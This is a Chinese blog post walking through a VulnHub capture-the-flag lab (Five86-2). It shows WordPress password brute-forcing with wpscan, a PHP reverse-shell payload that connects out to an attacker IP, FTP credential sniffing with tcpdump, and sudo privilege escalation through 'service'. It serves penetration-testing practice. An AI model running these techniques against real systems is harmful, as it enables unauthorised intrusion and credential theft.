<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>Five86-2 | 土豆子</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><meta name="generator" content="Hexo 4.2.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">Five86-2</h1><a id="logo" href="/.">土豆子</a><p class="description">Try Harder</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/tags/"><i class="fa fa-tag"> 标签</i></a><a href="/toolbox/"><i class="fa fa-wrench"> Tools</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">Five86-2</h1><div class="post-meta">Mar 20, 2020<span> | </span><span class="category"><a href="/categories/vulnhub/">vulnhub</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#情报收集"><span class="toc-number">1.</span> <span class="toc-text">情报收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#撬开大门"><span class="toc-number">2.</span> <span class="toc-text">撬开大门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#登堂入室"><span class="toc-number">3.</span> <span class="toc-text">登堂入室</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#身份转换"><span class="toc-number">4.</span> <span class="toc-text">身份转换</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#权限提升"><span class="toc-number">5.</span> <span class="toc-text">权限提升</span></a></li></ol></div></div><div class="post-content"><blockquote>
<p>2020-02-26</p>
</blockquote>
<h2 id="情报收集"><a href="#情报收集" class="headerlink" title="情报收集"></a>情报收集</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">20/tcp closed ftp-data</span><br><span class="line">21/tcp open   ftp      ProFTPD 1.3.5e</span><br><span class="line">80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))</span><br></pre></td></tr></table></figure>



<p>无 <code>ProFTPD 1.3.5e</code> 相关漏洞，无法匿名登录</p>
<p>后台放置目录枚举，<code>WordPress</code> 站点 <code>wpscan</code> 扫描</p>
<p><img src="2020-02-26-15-21-50%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-26-15-21-50屏幕截图"> <img src="2020-02-26-15-22-25%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-26-15-22-25屏幕截图"> </p>
<p>逐一访问，无有价值信息，<code>wpscan</code> 枚举出了几个用户名：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">barney</span><br><span class="line">peter</span><br><span class="line">admin</span><br><span class="line">gillian</span><br><span class="line">stephen</span><br></pre></td></tr></table></figure>

<p>尝试枚举爆破，枚举出两个密码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://192.168.56.117 -U tmp/user.txt -P /usr/share/wordlists/rockyou.txt -t 30</span><br><span class="line"></span><br><span class="line"><span class="comment"># [SUCCESS] - barney / spooky1                                                                 </span></span><br><span class="line"><span class="comment"># [SUCCESS] - stephen / apollo1</span></span><br></pre></td></tr></table></figure>



<p><img src="2020-02-26-15-53-05%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-26-15-53-05屏幕截图"> </p>
<p><img src="2020-02-26-16-37-11%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-26-16-37-11屏幕截图"> </p>
<h2 id="撬开大门"><a href="#撬开大门" class="headerlink" title="撬开大门"></a>撬开大门</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">barney ： spooky1   </span><br><span class="line">stephen ： apollo1</span><br></pre></td></tr></table></figure>

<p>两个账号均可登录后台，不过 <code>stephen</code> 无利用点</p>
<p><code>barney</code> 登陆后，有三个插件，搜索相关漏洞，除第三个插件外，其他暂无价值：</p>
<p>根据 <code>PoC</code> 说明，写出 <code>exp</code> ，上传后，本地端口监听，访问上传网址，得到 <code>shell</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> exec(<span class="string">"/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.56.109/8848 0&gt;&amp;1'"</span>);</span><br></pre></td></tr></table></figure>

<p>注意：用 <code>echo</code> 写入的时候注意引号的转义，写入后最好再查看一遍利用脚本的内容是否正确</p>
<p><img src="2020-02-26-17-37-01%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-26-17-37-01屏幕截图"></p>
<p><img src="2020-02-26-17-37-18%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-26-17-37-18屏幕截图"> <img src="2020-02-26-17-34-20%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="被忽略的转义"></p>
<h2 id="登堂入室"><a href="#登堂入室" class="headerlink" title="登堂入室"></a>登堂入室</h2><p>接收到了 <code>shell</code> 先收集一波信息，最喜欢的 <code>/etc/passwd</code> 里总是包含用户及其主目录，<code>HOME</code> 下的用户目录无访问权限</p>
<p>各种信息收集了一波，当前用户的作用实在不大。无思路无目的时候，就是收集的情报不够，整理一下现有资料：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">PORT   STATE  SERVICE  VERSION</span><br><span class="line">20/tcp closed ftp-data</span><br><span class="line">21/tcp open   ftp      ProFTPD 1.3.5e					无相关漏洞</span><br><span class="line">80/tcp open   http     Apache httpd 2.4.41 ((Ubuntu))	无相关漏洞</span><br><span class="line"><span class="comment">#####################</span></span><br><span class="line">barney		spooky1		FTP：No	WordPress：OK</span><br><span class="line">peter</span><br><span class="line">admin</span><br><span class="line">gillian</span><br><span class="line">stephen		apollo1		FTP：No	WordPress：OK</span><br><span class="line"><span class="comment">######################</span></span><br><span class="line">barney		:x:1001:1001:Barney Sumner:/home/barney:/bin/bash</span><br><span class="line">stephen		:x:1002:1002:Stephen Morris:/home/stephen:/bin/bash</span><br><span class="line">peter		:x:1003:1003:Peter Hook:/home/peter:/bin/bash</span><br><span class="line">gillian		:x:1004:1004:Gillian Gilbert:/home/gillian:/bin/bash</span><br><span class="line">richard		:x:1005:1005:Richard Starkey:/home/richard:/bin/bash</span><br><span class="line">paul		:x:1006:1006:Paul McCartney:/home/paul:/bin/bash</span><br><span class="line">john		:x:1007:1007:John Lennon:/home/john:/bin/bash</span><br><span class="line">george		:x:1008:1008:George Harrison:/home/george:/bin/bash</span><br><span class="line"><span class="comment">#####################</span></span><br><span class="line">得到密码的两个账号无法登陆 FTP</span><br><span class="line"></span><br><span class="line"><span class="comment">#####################									&lt;----- 未验证/未收集</span></span><br><span class="line">Linux kernel 信息未收集（内核提权）</span><br><span class="line">FTP 没有起到作用（存在即有理）</span><br><span class="line"></span><br><span class="line"><span class="comment">####################</span></span><br><span class="line">两个账户存在于 /etc/passwd 下，是否可以切换用户</span><br><span class="line">barney 密码错误</span><br><span class="line">stephen 可以切换</span><br><span class="line"><span class="comment">####################</span></span><br><span class="line">barney		spooky1		FTP：No	WordPress：OK	su：NO</span><br><span class="line">peter</span><br><span class="line">admin</span><br><span class="line">gillian</span><br><span class="line">stephen		apollo1		FTP：No	WordPress：OK	su：OK	&lt;----- 切入点</span><br></pre></td></tr></table></figure>



<p><img src="2020-02-26-17-38-13%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-26-17-38-13屏幕截图"></p>
<h2 id="身份转换"><a href="#身份转换" class="headerlink" title="身份转换"></a>身份转换</h2><p><code>su stephen</code> ：切换用户</p>
<p>不存在 <code>sudo</code> 权限，主目录暂无利用信息，卡住了</p>
<p>查了一下 WriteUp，抓 <code>FTP</code> 的包，有明文密码：</p>
<p>查看相关进程：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ps -aux | grep <span class="string">"ftp"</span></span><br><span class="line"></span><br><span class="line">systemd+  1376  0.0  0.9 119972  9484 pts/0    Ss+  02:32   0:00 proftpd: (accepting connections)</span><br><span class="line">paul      2883  0.0  0.0   2600   732 ?        Ss   05:38   0:00 /bin/sh -c /home/paul/ftp_upload.sh &gt; /dev/null 2&gt;&amp;1</span><br><span class="line">paul      2884  0.0  0.0   2600   864 ?        S    05:38   0:00 /bin/sh /home/paul/ftp_upload.sh</span><br><span class="line">paul      2885  0.0  0.2   3224  2036 ?        S    05:38   0:00 ftp -n 172.18.0.10</span><br><span class="line">1000      2886  0.0  0.8 133072  8136 pts/0    S+   05:38   0:00 proftpd: paul - 172.18.0.1: STOR file.txt</span><br><span class="line">stephen   2889  0.0  0.0   6296   924 pts/0    S+   05:38   0:00 grep ftp</span><br></pre></td></tr></table></figure>



<p>查看 FTP 监听的网卡：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ip addr</span><br><span class="line"></span><br><span class="line">--</span><br><span class="line">3: br-eca3858d86bf: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default </span><br><span class="line">    link/ether 02:42:9e:df:8d:0f brd ff:ff:ff:ff:ff:ff</span><br><span class="line">    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-eca3858d86bf</span><br><span class="line">       valid_lft forever preferred_lft forever</span><br><span class="line">    inet6 fe80::42:9eff:fedf:8d0f/64 scope link</span><br></pre></td></tr></table></figure>



<p>抓包，得到密码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">timeout 50 tcpdump -i br-eca3858d86bf -w pack.pcap</span><br><span class="line">tcpdump -r pack.pcap</span><br></pre></td></tr></table></figure>





<p><img src="2020-02-27-13-39-28%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-27 13-39-28屏幕截图"> </p>
<p><img src="2020-02-27-14-40-50%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-27 14-40-50屏幕截图"> </p>
<h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h2><p>登录 <code>paul</code> 查看可以 <code>sudo</code> 执行的程序：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Matching Defaults entries <span class="keyword">for</span> paul on five86-2:</span><br><span class="line">    env_reset, mail_badpass,</span><br><span class="line">    secure_path=/usr/<span class="built_in">local</span>/sbin\:/usr/<span class="built_in">local</span>/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User paul may run the following commands on five86-2:</span><br><span class="line">    (peter) NOPASSWD: /usr/sbin/service</span><br></pre></td></tr></table></figure>



<p><code>/usr/sbin/service</code> 提权：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -u peter service ../../bin/bash</span><br></pre></td></tr></table></figure>



<p>查看可以 <code>sudo</code> 执行的程序：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Matching Defaults entries <span class="keyword">for</span> peter on five86-2:</span><br><span class="line">    env_reset, mail_badpass,</span><br><span class="line">    secure_path=/usr/<span class="built_in">local</span>/sbin\:/usr/<span class="built_in">local</span>/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User peter may run the following commands on five86-2:</span><br><span class="line">    (ALL : ALL) ALL</span><br><span class="line">    (root) NOPASSWD: /usr/bin/passwd</span><br></pre></td></tr></table></figure>



<p>修改 <code>root</code> 密码，登录 <code>root</code> 查看 <code>flag</code> ：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo passwd root</span><br><span class="line"></span><br><span class="line">su -</span><br></pre></td></tr></table></figure>





<p><img src="2020-02-27-14-54-14%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png" alt="2020-02-27 14-54-14屏幕截图"> </p>
<hr>
<p>卡在了 <code>FTP</code> 抓包的位置，还是经验不足</p>
<p>前期收集的信息必定是有用的，<code>FTP</code> 使用明文传输密码，只需要抓包，就可以得到</p>
<p>查看系统正在运行的进程也要加入信息收集里面</p>
</div><div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>Potatoz</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="/2020/03/20/Five86-2/">https://mr-potatoz.github.io/2020/03/20/Five86-2/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>欢迎转载、引用，但请标明作者和原文地址，谢谢。 :D</li></ul></div><br><div class="tags"><a href="/tags/vulnhub/">vulnhub</a><a href="/tags/OSCP/">OSCP</a></div><div class="post-nav"><a class="pre" href="/2020/03/20/LiterallyVulnerable/">LiterallyVulnerable</a><a class="next" href="/2020/03/10/Five86-1/">Five86-1</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/vulnhub/">vulnhub</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9A%8F%E7%AC%94/">随笔</a><span class="category-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/Note/" style="font-size: 15px;">Note</a> <a href="/tags/vulnhub/" style="font-size: 25px;">vulnhub</a> <a href="/tags/OSCP/" style="font-size: 25px;">OSCP</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/DC-1/">DC-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/LiterallyVulnerable/">LiterallyVulnerable</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/20/Five86-2/">Five86-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/10/Five86-1/">Five86-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/10/hackNos-2/">hackNos-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/03/Me-and-My-Girlfirend1/">Vulnhub靶机——Me and My Girlfirend1</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/03/03/JIS-CTF/">Vulnhub靶机——JIS-CTF</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/29/Test/">Try Harder</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://github.com/Mr-Potatoz" title="Github" target="_blank">Github</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2020 <a href="/." rel="nofollow">土豆子.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/search.js?v=0.0.0"></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
   search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div></body></html>